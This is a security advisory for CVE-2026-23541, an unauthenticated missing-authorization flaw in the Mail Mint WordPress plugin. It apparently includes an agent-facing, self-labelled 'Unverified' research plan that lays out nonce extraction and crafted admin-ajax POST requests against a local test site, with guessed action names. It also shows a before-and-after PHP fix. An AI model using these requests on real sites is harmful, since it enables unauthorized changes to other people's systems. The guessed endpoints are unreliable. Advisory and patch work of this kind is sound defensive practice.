CVE-2026-23541

Mail Mint <= 1.19.4 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 1.19.5
Time to patch: 7d

Description

The Mail Mint plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.19.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.19.4
Published: February 18, 2026
Last updated: February 24, 2026
Affected plugin: mail-mint

Source Code

WordPress.org SVN
Research Plan
Unverified


This research plan focuses on identifying and exploiting a missing authorization vulnerability in the Mail Mint plugin (versions <= 1.19.4). The vulnerability allows unauthenticated attackers to trigger actions that should be restricted to administrators.

1. Vulnerability Summary

  • Vulnerability: Missing Authorization (Insecure Direct Object Reference / Improper Access Control).
  • Plugin: Mail Mint – Email Marketing, Newsletter, Email Automation & WooCommerce Emails (slug: mail-mint).
  • Affected Versions: <= 1.19.4.
  • Root Cause: The plugin registers AJAX handlers using the wp_ajax_nopriv_ hook for functions that perform sensitive operations (e.g., updating settings, managing contacts, or dismissing notices) without implementing sufficient current_user_can() capability checks within the callback functions.
  • Impact: Unauthenticated attackers can modify plugin configurations or metadata (Integrity: Low).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php.
  • Method: POST.
  • Action Parameter: Likely prefixed with mimi_ (the internal shorthand for Mail Mint), such as mimi_dismiss_notice, mimi_save_settings, or mimi_update_contact.
  • Payload: URL-encoded POST parameters containing the action, a nonce (if required/exposed), and the target data to modify.
  • Preconditions: The plugin must be active. For contact-related actions, at least one contact ID must be known or guessed (IDOR).

3. Code Flow (Inferred)

  1. Registration: The plugin uses a centralized AJAX dispatcher, likely in src/App/Framework/Ajax/Ajax_Handler.php or includes/Core/Ajax.php.
  2. Dispatch: It registers hooks:
    add_action( 'wp_ajax_mimi_some_action', [ $this, 'callback' ] );
    add_action( 'wp_ajax_nopriv_mimi_some_action', [ $this, 'callback' ] ); // Vulnerable if registered here
    
  3. Execution: The callback function is invoked.
  4. Vulnerability: The callback function performs an operation (e.g., update_option) but only checks for a nonce (which might be public) and fails to verify current_user_can( 'manage_options' ).
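The handler pattern this section infers, shown as an added illustration beside the corrected form; this is not Mail Mint's code, and the action name, nonce action and option key are hypothetical placeholders:

```php
<?php
// Added illustration of the AJAX handler pattern described in section 3; not Mail Mint's code.
// 'mimi_save_settings', 'mimi_nonce' and 'mimi_example_settings' are hypothetical placeholders.

// BEFORE: the pattern the research plan suspects. Registering the same callback on
// wp_ajax_nopriv_* makes it reachable without a session, and a nonce check alone does not
// establish who the caller is (the nonce may be printed on a public page by wp_localize_script).
add_action( 'wp_ajax_mimi_save_settings',        'mimi_save_settings_insecure' );
add_action( 'wp_ajax_nopriv_mimi_save_settings', 'mimi_save_settings_insecure' );

function mimi_save_settings_insecure() {
    check_ajax_referer( 'mimi_nonce', '_wpnonce' );   // proves only that a valid nonce was supplied
    $settings = isset( $_POST['settings'] ) ? (array) wp_unslash( $_POST['settings'] ) : array();
    update_option( 'mimi_example_settings', $settings ); // admin-only state change, no capability check
    wp_send_json_success();
}

// AFTER: an admin-only action is registered on wp_ajax_* only (logged-in users), and the
// callback verifies the capability in addition to the nonce. Input is sanitised before storage.
add_action( 'wp_ajax_mimi_save_settings', 'mimi_save_settings_secure' );

function mimi_save_settings_secure() {
    check_ajax_referer( 'mimi_nonce', '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        // wp_send_json_error() terminates the request, so no return is needed.
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    $raw      = isset( $_POST['settings'] ) ? (array) wp_unslash( $_POST['settings'] ) : array();
    $settings = array_map( 'sanitize_text_field', $raw );
    update_option( 'mimi_example_settings', $settings );
    wp_send_json_success();
}
```

The capability check is what the CVSS vector (PR:N, I:L) says is missing: the nonce decides whether the request is well-formed, current_user_can() decides whether the caller may perform it.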

4. Nonce Acquisition Strategy

Mail Mint typically localizes its AJAX URL and nonces for use in its frontend and backend scripts.

  1. Identify the Script: Look for wp_localize_script calls in the source code. The variable name is often mail_mint_vars or mimi_admin.
  2. Trigger Page: Create a page that forces the plugin to load its frontend assets (often used for lead capture forms).
    • Command: wp post create --post_type=page --post_status=publish --post_content='[mail_mint_form id="1"]' (Search for actual shortcodes using grep -r "add_shortcode" .).
  3. Extraction:
    • Navigate to the created page.
    • Use browser_eval to extract the nonce:
      window.mail_mint_vars?.nonce || window.mimi_vars?.nonce
      
  4. Action Check: Compare the action used in wp_create_nonce (found in source) with the one used in the vulnerable handler. If they use a generic nonce like mimi_nonce, it can be reused across different actions.

5. Exploitation Strategy

The goal is to perform an "unauthorized action." A common and verifiable action in this plugin is dismissing administrative notices or updating non-critical settings.

Target Action: mimi_dismiss_notice (Hypothetical but highly likely)

  1. Request Tool: http_request.
  2. URL: http://localhost:8080/wp-admin/admin-ajax.php.
  3. Headers: Content-Type: application/x-www-form-urlencoded.
  4. Body:
    action=mimi_dismiss_notice&notice_id=mail_mint_review_notice&_wpnonce=[EXTRACTED_NONCE]
    

Target Action: mimi_save_settings (Alternative)

  1. Body:
    action=mimi_save_settings&settings[email_limit]=9999&_wpnonce=[EXTRACTED_NONCE]
    

6. Test Data Setup

  1. Install Mail Mint 1.19.4.
  2. Create a subscriber or a custom field to have a target for modification.
  3. Determine the available shortcodes:
    grep -rn "add_shortcode" wp-content/plugins/mail-mint/
  4. Create a public page with the found shortcode to expose the nonce.

7. Expected Results

  • Success: The server returns a 200 OK response, often with a JSON body like {"success":true}.
  • Outcome: A specific setting is changed in the database, or a notice is marked as dismissed for all users.

8. Verification Steps

After sending the POST request, verify the state change using WP-CLI:

  1. Check Settings:
    wp option get mail_mint_settings
  2. Check Notice Status:
    wp option get mail_mint_dismissed_notices (exact option name may vary; search using wp option list --search="*mimi*")
  3. Check Contact Metadata:
    wp db query "SELECT * FROM wp_mimi_contacts WHERE id = 1" (Verify if the plugin uses custom tables).

9. Alternative Approaches

  • REST API: If AJAX handlers are secure, check REST routes. Search for register_rest_route and look for routes where permission_callback is set to __return_true or is missing.
    • Endpoint: /wp-json/mail-mint/v1/...
  • Information Disclosure: If the vulnerability allows "unauthorized actions," check if mimi_get_contacts or mimi_export_contacts is also registered as nopriv. This would upgrade the severity by adding Confidentiality: High.

Identification Commands for the Agent:

# Find all nopriv AJAX actions
grep -r "wp_ajax_nopriv_" wp-content/plugins/mail-mint/

# Find the callback functions associated with those actions
grep -rP "add_action\s*\(\s*['\"]wp_ajax_nopriv_mimi_(\w+)['\"]" wp-content/plugins/mail-mint/

# Check a specific callback (e.g., save_settings) for capability checks
# Replace 'callback_function_name' with the result from the previous grep
grep -rA 20 "function callback_function_name" wp-content/plugins/mail-mint/ | grep "current_user_can"
